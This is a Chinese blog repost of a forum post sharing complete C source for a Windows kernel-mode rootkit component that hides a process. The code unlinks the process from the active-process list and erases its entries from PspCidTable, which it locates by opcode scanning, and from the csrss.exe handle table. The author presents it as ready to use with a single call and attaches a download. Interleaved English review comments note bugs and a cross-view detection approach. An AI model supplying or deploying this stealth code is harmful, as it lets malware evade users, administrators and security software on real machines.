
科普之三招隱藏進程

Posted on 2009-10-30 00:10 S.l.e!ep.¢% 閱讀(467) 評論(0)  編輯 收藏 引用 所屬分類: RootKit
【原創】科普之三招隱藏進程

標 題: 【原創】科普之三招隱藏進程
作 者: cooldiyer
時 間: 2008-09-20,11:58
鏈 接: http://bbs.pediy.com/showthread.php?t=73129

先從活動進程鏈表中摘除，擦除PspCidTable中對應的Object，再擦除Csrss進程中那份表
擦除HandleTable表用了一些技巧,不用親自操作三層表,不是網上流傳的方法,具體請看代碼......

使用的時候直接HideProcessById(HIDE_PID)就行了
偶這只菜鳥的學習總結,牛們不要BS,我會超過你們的.很快

ProcessHide.h
代碼:
#ifndef?__PROCESSHIDE_H__
#define?__PROCESSHIDE_H__

#ifdef?__cplusplus
extern?"C"?{
#endif

#include?<ntddk.h>

/*
 使用之前請先調用InitializeCommonVariables初始化全局變量
*/

/*
 * Locally re-declared handle-table entry; this layout is not provided by
 * <ntddk.h>. Only the Object member is touched by this file (in
 * EraseObjectFromHandleTable, via InterlockedExchangePointer). The layout is
 * assumed to match the NT 5.x kernels that InitializeCommonVariables
 * recognises -- TODO verify against the exact target build.
 */
typedef struct _HANDLE_TABLE_ENTRY {

    //
    //  The pointer to the object overloaded with three ob attributes bits in
    //  the lower order and the high bit to denote locked or unlocked entries
    //

    union {

        PVOID Object;

        ULONG ObAttributes;
    };

    //
    //  This field either contains the granted access mask for the handle or an
    //  ob variation that also stores the same information.  Or in the case of
    //  a free entry the field stores the index for the next free entry in the
    //  free list.  This is like a FAT chain, and is used instead of pointers
    //  to make table duplication easier, because the entries can just be
    //  copied without needing to modify pointers.
    //

    union {

        union {

            ACCESS_MASK GrantedAccess;

            struct {

                USHORT GrantedAccessIndex;
                USHORT CreatorBackTraceIndex;
            };
        };

        LONG NextFreeTableEntry;
    };

} HANDLE_TABLE_ENTRY, *PHANDLE_TABLE_ENTRY;

/*
 * Locally re-declared handle table (not provided by <ntddk.h>). This file
 * never dereferences its fields itself: the table is passed opaquely to the
 * kernel's ExEnumHandleTable (see EraseObjectFromHandleTable), which is what
 * the page means by "no need to walk the three-level table by hand". The
 * layout is assumed to be NT 5.x -- TODO verify against the target build.
 */
typedef struct _HANDLE_TABLE {

    //
    //  A set of flags used to denote the state or attributes of this
    //  particular handle table
    //

    ULONG Flags;

    //
    //  The number of handle table entries in use.
    //  Note: EraseObjectFromHandleTable clears an entry's Object without
    //  adjusting this count, so the table is left internally inconsistent.
    //

    LONG HandleCount;

    //
    //  A pointer to the top level handle table tree node.
    //

    PHANDLE_TABLE_ENTRY **Table;

    //
    //  The process who is being charged quota for this handle table and a
    //  unique process id to use in our callbacks
    //

    struct _EPROCESS *QuotaProcess;
    HANDLE UniqueProcessId;

    //
    //  This is a singly linked list of free table entries.  We don't actually
    //  use pointers, but have each store the index of the next free entry
    //  in the list.  The list is managed as a lifo list.  We also keep track
    //  of the next index that we have to allocate pool to hold.
    //

    LONG FirstFreeTableEntry;
    LONG NextIndexNeedingPool;

    //
    //  This is the lock used to protect the fields in the record, and the
    //  handle table tree in general.  Individual handle table entries that are
    //  not free have their own lock
    //

    ERESOURCE HandleTableLock;

    //
    //  The list of global handle tables.  This field is protected by a global
    //  lock.
    //

    LIST_ENTRY HandleTableList;

    //
    //  The following field is used to loosely synchronize thread contention
    //  on a handle.  If a thread wants to wait for a handle to be unlocked
    //  it will wait on this event with a short timeout.  Any handle unlock
    //  operation will pulse this event if there are threads waiting on it
    //

    KEVENT HandleContentionEvent;
} HANDLE_TABLE, *PHANDLE_TABLE;

/*
 * Callback signature for ExEnumHandleTable. EraseObjectFromHandleTable relies
 * on a TRUE return from the callback ending the walk and making
 * ExEnumHandleTable itself return TRUE -- confirm against the target kernel.
 */
typedef BOOLEAN (*EX_ENUMERATE_HANDLE_ROUTINE)(
  IN PHANDLE_TABLE_ENTRY HandleTableEntry,
  IN HANDLE Handle,
  IN PVOID EnumParameter
  );

/*
 * Function-pointer type for ExEnumHandleTable, which is not declared in
 * <ntddk.h> and is resolved by name with MmGetSystemRoutineAddress at run
 * time. Style note: identifiers starting with a double underscore are
 * reserved for the implementation in C.
 */
typedef BOOLEAN (*__ExEnumHandleTable)(
  IN PHANDLE_TABLE HandleTable,
  IN EX_ENUMERATE_HANDLE_ROUTINE EnumHandleProcedure,
  IN PVOID EnumParameter,
  OUT PHANDLE Handle OPTIONAL
  );

/* Locate the unexported PspCidTable by scanning PsLookupProcessByProcessId's
 * code. STATUS_NOT_FOUND if no match within one page. */
NTSTATUS
GetPspCidTable(
  OUT PHANDLE_TABLE* ppPspCidTable
  );

/* ExEnumHandleTable callback: matches Handle against the HANDLE stored at
 * *EnumParameter and overwrites that slot with the entry pointer on a hit. */
BOOLEAN
EnumHandleCallback(
  IN PHANDLE_TABLE_ENTRY HandleTableEntry,
  IN HANDLE Handle,
  IN OUT PVOID EnumParameter
  );

/* Set Object = NULL on the entry of pHandleTable whose handle value equals
 * ProcessId. Note the missing IN annotation on pHandleTable. */
NTSTATUS
EraseObjectFromHandleTable(
  PHANDLE_TABLE pHandleTable,
  IN HANDLE ProcessId
  );

/* Unlink the EPROCESS for ProcessId from the active-process list
 * (requires g_Offset_Eprocess_Flink to be initialised). */
NTSTATUS
RemoveNodeFromActiveProcessLinks(
  IN HANDLE ProcessId
  );

/* Entry point: unlink from the active list, then erase the entry from
 * PspCidTable and from the CSRSS.EXE handle table. Returns only the status
 * of the last step. */
NTSTATUS
HideProcessById(
  IN HANDLE ProcessId
  );

/* Fill the g_Offset_* globals and g_pEprocess_System from PsGetVersion;
 * call before anything else (HideProcessById does so lazily). */
NTSTATUS
InitializeCommonVariables(
  );

/* Scan the current EPROCESS for "System" to find the image-name offset;
 * intended to run from DriverEntry. */
NTSTATUS
GetProcessNameOffset(
  OUT PULONG  Offset OPTIONAL
  );

/* Walk the active-process list from g_pEprocess_System and return the first
 * process whose image name matches pcProcessName (case-insensitive prefix
 * compare). Style note: the definition names this parameter pEprocess. */
NTSTATUS
LookupProcessByName(
  IN PCHAR pcProcessName,
  OUT PEPROCESS *Process
  );
#ifdef?__cplusplus
}?//?extern?"C"
#endif

#endif?//?__PROCESSHIDE_H__
ProcessHide.c
代碼:
#include?"ProcessHide.h"
#include?"LDasm.h"

/* EPROCESS field offsets, filled in by InitializeCommonVariables (hard-coded
 * per NT 5.x version) and GetProcessNameOffset. Zero means "not initialised";
 * HideProcessById uses g_Offset_Eprocess_HandleTable as that sentinel.
 * Style note: NULL is the pointer constant, yet it initialises ULONGs here. */
ULONG    g_Offset_Eprocess_Name = NULL;        // image-name field, found by scanning for "System"
ULONG    g_Offset_Eprocess_Flink = NULL;       // ActiveProcessLinks LIST_ENTRY
ULONG    g_Offset_Eprocess_ProcessId = NULL;   // process id, read as a ULONG
ULONG    g_Offset_Eprocess_HandleTable = NULL; // handle-table pointer, read as a ULONG

/* The EPROCESS InitializeCommonVariables ran in (PsGetCurrentProcess);
 * LookupProcessByName starts its walk here. */
PEPROCESS  g_pEprocess_System = NULL;


NTSTATUS
GetPspCidTable(
  OUT PHANDLE_TABLE* ppPspCidTable
  )
  /*
  Locate PspCidTable (not exported) by scanning the code of
  PsLookupProcessByProcessId: the first instruction within one page that is
  "push dword ptr [imm32]" (bytes FF 35) followed by a call opcode (E8) is
  taken to reference PspCidTable, and its imm32 operand is dereferenced.

  Returns STATUS_SUCCESS with *ppPspCidTable set, or STATUS_NOT_FOUND if no
  match is seen within PAGE_SIZE bytes or the disassembler reports length 0.

  Review notes: the result of MmGetSystemRoutineAddress is not checked before
  the scan starts; the address is kept in a ULONG and the operand cast assumes
  32-bit pointers; the byte pattern is tied to a particular kernel build, so
  another build yields STATUS_NOT_FOUND or, if a different push matches
  first, a wrong pointer. The local PsLookupProcessByProcessId shadows the
  kernel routine of the same name inside this function.
  */
{
  NTSTATUS    status;
  PUCHAR      cPtr;
  unsigned char * pOpcode;
  ULONG      Length;
  UNICODE_STRING  uniPsLookup;
  ULONG      PsLookupProcessByProcessId;

  status = STATUS_NOT_FOUND;

  RtlInitUnicodeString(&uniPsLookup, L"PsLookupProcessByProcessId");
  PsLookupProcessByProcessId = MmGetSystemRoutineAddress(&uniPsLookup); // resolves an exported kernel routine by name

  for (cPtr = (PUCHAR)PsLookupProcessByProcessId;
    cPtr < (PUCHAR)PsLookupProcessByProcessId + PAGE_SIZE;
    cPtr += Length)
  {
    Length = SizeOfCode(cPtr, &pOpcode);    // instruction length and opcode position; credit to LDasm.c by Ms-Rem
    if (!Length) break;
    // Opcode test uses cPtr, the byte at +6 uses pOpcode -- presumably the
    // same address when the instruction carries no prefix; verify in LDasm.
    if (*(PUSHORT)cPtr == 0x35FF && *(pOpcode + 6) == 0xE8)
    {
      *ppPspCidTable = **(PVOID **)(pOpcode + 2);   // imm32 at +2 holds &PspCidTable
      status = STATUS_SUCCESS;
      break;
    }
  }
  return status;
}

/*
 * ExEnumHandleTable callback used by EraseObjectFromHandleTable.
 * EnumParameter points at a pointer-sized slot that holds the HANDLE to look
 * for on input; on a match the same slot is overwritten with the entry
 * pointer, which the caller reads back as a PHANDLE_TABLE_ENTRY. This relies
 * on HANDLE and PHANDLE_TABLE_ENTRY having the same size.
 * Returns TRUE on the matching entry (the caller treats a TRUE result of the
 * enumeration as "found"), FALSE otherwise.
 */
BOOLEAN
EnumHandleCallback(
  IN PHANDLE_TABLE_ENTRY HandleTableEntry,
  IN HANDLE Handle,
  IN OUT PVOID EnumParameter
  )
{
  if (ARGUMENT_PRESENT(EnumParameter) && *(HANDLE *)EnumParameter == Handle)
  {
    *(PHANDLE_TABLE_ENTRY *)EnumParameter = HandleTableEntry;  // slot now carries the entry, not the handle
    return TRUE;
  }
  return FALSE;
}

//?修改一下,可以傳遞要擦除的ID做參數
/*
 * Clear the Object pointer of the entry in pHandleTable whose handle value
 * equals ProcessId. HideProcessById calls this once for PspCidTable and once
 * for the table read from the CSRSS.EXE process, with the same ProcessId as
 * the handle value in both cases.
 * ExEnumHandleTable is resolved by name at run time. Returns STATUS_NOT_FOUND
 * if it cannot be resolved or no entry matched, STATUS_SUCCESS once the
 * entry's Object has been exchanged to NULL.
 * Only Object is written: GrantedAccess / the free-list link and the table's
 * HandleCount are untouched, so the table is left internally inconsistent --
 * an inconsistency a kernel-integrity check may key on. pHandleTable is used
 * as given, with no validation.
 */
NTSTATUS
EraseObjectFromHandleTable(
  PHANDLE_TABLE pHandleTable,
  IN HANDLE ProcessId
  )
{
  NTSTATUS    status;

  PVOID      EnumParameter;   // in: handle to find; out: PHANDLE_TABLE_ENTRY (see EnumHandleCallback)
  UNICODE_STRING  uniExEnumHandleTable;

  __ExEnumHandleTable  ExEnumHandleTable;

  status = STATUS_NOT_FOUND;
  EnumParameter = ProcessId;


  RtlInitUnicodeString(&uniExEnumHandleTable, L"ExEnumHandleTable");
  ExEnumHandleTable = MmGetSystemRoutineAddress(&uniExEnumHandleTable);

  if (NULL == ExEnumHandleTable)
  {
    return STATUS_NOT_FOUND;
  }

  // Erase only after the enumeration has returned; the entry must not be
  // modified from inside the callback.
  if (ExEnumHandleTable(pHandleTable, EnumHandleCallback, &EnumParameter, NULL))
  {
    InterlockedExchangePointer(&((PHANDLE_TABLE_ENTRY)EnumParameter)->Object, NULL);
    status = STATUS_SUCCESS;
  }

  return status;
}

/*
 * Unlink the EPROCESS for ProcessId from the active-process list by
 * rewriting its neighbours' Flink/Blink. The removed node's own links are
 * left as they were (not self-pointed), and the EPROCESS object itself is
 * untouched. Returns the status of PsLookupProcessByProcessId; the unlink
 * itself has no failure path.
 * Review notes: the reference returned by PsLookupProcessByProcessId is
 * released before pEprocess is used; the list is modified without any lock
 * or interlocked operation; the ULONG pointer arithmetic assumes 32-bit.
 * The process stays reachable through the other structures HideProcessById
 * goes on to edit, which is why cross-view comparison (active list versus
 * id table versus handle tables) remains a detection approach.
 */
NTSTATUS
RemoveNodeFromActiveProcessLinks(
  IN HANDLE ProcessId
  )
{
  NTSTATUS  status;
  PLIST_ENTRY  pListEntry;
  PEPROCESS  pEprocess;

  status = PsLookupProcessByProcessId(ProcessId, &pEprocess);

  if (!NT_SUCCESS(status))
  {
    return status;
  }
  ObDereferenceObject(pEprocess);   // reference dropped here, pointer still used below

  pListEntry = (ULONG)pEprocess + g_Offset_Eprocess_Flink;   // integer-to-pointer; ActiveProcessLinks of this EPROCESS

  // Unlink: make both neighbours skip this node.
  pListEntry->Blink->Flink = pListEntry->Flink;
  pListEntry->Flink->Blink = pListEntry->Blink;

  return status;
}


/*
 * Hide ProcessId from three kernel views in sequence: the active-process
 * list, PspCidTable, and the handle table read from the CSRSS.EXE process.
 * The EPROCESS itself is left in place; only the pointers that enumerate it
 * are edited. The offset globals are initialised lazily, using
 * g_Offset_Eprocess_HandleTable == NULL as the "not yet" sentinel.
 * Returns the failure status of initialisation, the PspCidTable search or
 * the CSRSS lookup if any of those fail; otherwise only the status of the
 * LAST erasure -- the results of the unlink and the PspCidTable erasure are
 * overwritten, so a partial hide is reported by the csrss step alone.
 * Review notes: the csrss handle table is read as the ULONG at
 * g_Offset_Eprocess_HandleTable and passed as a pointer (32-bit only); the
 * "\0" in the CSRSS literal is redundant because LookupProcessByName
 * measures the name with strlen.
 */
NTSTATUS
HideProcessById(
  IN HANDLE ProcessId
  )
{
  NTSTATUS    status;
  PHANDLE_TABLE  pPspCidTable;
  PEPROCESS    pCsrssEprocess = NULL;


  if (NULL == g_Offset_Eprocess_HandleTable)
  {
    status = InitializeCommonVariables();
    if (!NT_SUCCESS(status))
    {
      return status;
    }
  }

  status = GetPspCidTable(&pPspCidTable);

  if (!NT_SUCCESS(status))
  {
    return status;
  }

  status = LookupProcessByName("CSRSS.EXE\0", &pCsrssEprocess);

  if (!NT_SUCCESS(status))
  {
    return status;
  }

  // First unlink from the active-process list (status not checked)
  status = RemoveNodeFromActiveProcessLinks(ProcessId);


  // Erase the matching Object from PspCidTable (status not checked)
  status = EraseObjectFromHandleTable(pPspCidTable, ProcessId);


  // Erase from the copy of the table held by the csrss process
  status = EraseObjectFromHandleTable(*(PULONG)((ULONG)pCsrssEprocess + g_Offset_Eprocess_HandleTable), ProcessId);


  return status;
}

/*
 * Walk the active-process list starting at g_pEprocess_System and return the
 * first EPROCESS whose image name (at g_Offset_Eprocess_Name) matches
 * pcProcessName case-insensitively for strlen(pcProcessName) bytes -- a prefix
 * match, not an exact one. The walk stops when it returns to the starting
 * process id after at least one step.
 * Returns STATUS_INVALID_PARAMETER if either argument is NULL, STATUS_NOT_FOUND
 * (with *pEprocess = NULL) after a full lap, STATUS_SUCCESS otherwise.
 * No reference is taken on the returned EPROCESS.
 * Review notes: the globals must already be initialised
 * (InitializeCommonVariables); casting pCurrentEprocess to ULONG as an lvalue
 * is a compiler extension and assumes 32-bit pointers; the header declares the
 * output parameter as "Process".
 */
NTSTATUS
LookupProcessByName(
  IN PCHAR pcProcessName,
  OUT PEPROCESS *pEprocess
  )
{
  NTSTATUS  status;
  ULONG    uCurrentProcessId = 0;
  ULONG    uStartProcessId = 0;
  ULONG    uCount = 0;          // steps taken; the wrap-around test is skipped on the first node
  ULONG    uLength = 0;
  PLIST_ENTRY  pListActiveProcess;
  PEPROCESS  pCurrentEprocess = NULL;


  if (!ARGUMENT_PRESENT(pcProcessName) || !ARGUMENT_PRESENT(pEprocess))
  {
    return STATUS_INVALID_PARAMETER;
  }

  uLength = strlen(pcProcessName);

  pCurrentEprocess = g_pEprocess_System;

  uStartProcessId = *((PULONG)((ULONG)pCurrentEprocess + g_Offset_Eprocess_ProcessId));

  uCurrentProcessId = uStartProcessId;

  while(1)
  {
    if(_strnicmp(pcProcessName, (PVOID)((ULONG)pCurrentEprocess + g_Offset_Eprocess_Name), uLength) == 0)
    {
      *pEprocess = pCurrentEprocess;
      status = STATUS_SUCCESS;
      break;
    }
    else if ((uCount >= 1) && (uStartProcessId == uCurrentProcessId))
    {
      *pEprocess = 0x00000000;   // integer literal used as a null pointer
      status = STATUS_NOT_FOUND;
      break;
    }
    else
    {
      // Follow Flink to the next LIST_ENTRY, then step back to the start of
      // its EPROCESS (a hand-rolled CONTAINING_RECORD).
      pListActiveProcess = (LIST_ENTRY *)((ULONG)pCurrentEprocess + g_Offset_Eprocess_Flink);
      (ULONG)pCurrentEprocess = (ULONG)pListActiveProcess->Flink;
      (ULONG)pCurrentEprocess = (ULONG)pCurrentEprocess - g_Offset_Eprocess_Flink;
      uCurrentProcessId = *(PULONG)((ULONG)pCurrentEprocess + g_Offset_Eprocess_ProcessId);
      uCount++;
    }
  }
  return status;
}

NTSTATUS
GetProcessNameOffset(
  OUT PULONG  Offset OPTIONAL
  )
           /*
           Called from DriverEntry, i.e. in the System process context: scan
           the current EPROCESS byte by byte for "System" to find the offset
           of the image-name field.
           Returns STATUS_INVALID_PARAMETER if Offset is not a valid address,
           STATUS_SUCCESS with *Offset set on the first match.
           Review notes: status is never assigned when no match occurs within
           3 * PAGE_SIZE, so an uninitialised value is returned on that path;
           the bytes scanned are not themselves checked with
           MmIsAddressValid; the parameter is marked OPTIONAL but a NULL
           Offset is presumably rejected by the validity check.
           */
{
  NTSTATUS  status;
  PEPROCESS  curproc;
  ULONG      i;

  if (!MmIsAddressValid((PVOID)Offset))
  {
    status = STATUS_INVALID_PARAMETER;
    return status;
  }

  curproc = PsGetCurrentProcess();

  //
  // Then search the KPEB to get the offset of ProcessName relative to the KPEB.
  // At offset 174h it stores the process's short image name, which few places
  // use (e.g. SoftICE's addr and proc commands); names over 16 characters are
  // simply truncated.

  // Scan for 12KB, hoping the KPEB never grows that big!
  //
  for( i = 0; i < 3 * PAGE_SIZE; i++ ) {

    if(!strncmp( "System", (PCHAR) curproc + i, strlen("System"))) {
      *Offset = i;
      status = STATUS_SUCCESS;
      break;
    }
  }
  return status;
}

/*
 * Fill the g_Offset_* globals and g_pEprocess_System. Meant to run in the
 * same context as GetProcessNameOffset (DriverEntry / System process), since
 * g_pEprocess_System is simply PsGetCurrentProcess().
 * Offsets are hard-coded per PsGetVersion major.minor: 5.0, 5.1 and 5.2 are
 * filled in; 4.0 sets only the Flink offset and returns STATUS_UNSUCCESSFUL.
 * Review notes: any other version falls through every branch and still
 * returns STATUS_SUCCESS with the ProcessId / Flink / HandleTable offsets left
 * at 0, so callers then compute addresses relative to offset 0 and
 * HideProcessById's NULL sentinel re-runs this function on every call.
 * PsGetVersion's return value is ignored.
 */
NTSTATUS
InitializeCommonVariables(
  )
{
  NTSTATUS  status;
  ULONG  uMajorVersion;
  ULONG  uMinorVersion;

  status = GetProcessNameOffset(&g_Offset_Eprocess_Name);

  if (!NT_SUCCESS(status))
  {
    return status;
  }

  g_pEprocess_System = PsGetCurrentProcess();   // whatever process this runs in, not necessarily "System"

  PsGetVersion(&uMajorVersion, &uMinorVersion, NULL, NULL);

  if (uMajorVersion == 4 && uMinorVersion == 0)
  {
    g_Offset_Eprocess_Flink = 152;
    // Stop supporting NT 4.0
    return STATUS_UNSUCCESSFUL;
  }
  else if (uMajorVersion == 5 && uMinorVersion == 0)
  {
    g_Offset_Eprocess_ProcessId = 156;
    g_Offset_Eprocess_Flink = 160;
    g_Offset_Eprocess_HandleTable = 0x128;
  }
  else if (uMajorVersion == 5 && uMinorVersion == 1)
  {
    g_Offset_Eprocess_ProcessId = 132;
    g_Offset_Eprocess_Flink = 136;
    g_Offset_Eprocess_HandleTable = 0xC4;
  }
  else if (uMajorVersion == 5 && uMinorVersion == 2)
  {
    g_Offset_Eprocess_ProcessId = 132;
    g_Offset_Eprocess_Flink = 136;
    g_Offset_Eprocess_HandleTable = 0xC4;
  }
  // No else: unrecognised versions leave the offsets at 0 and still succeed.

  return STATUS_SUCCESS;
}

上傳的附件
文件類型: rar ProcessHide.rar (6.1 KB, 465 次下載) [誰下載?]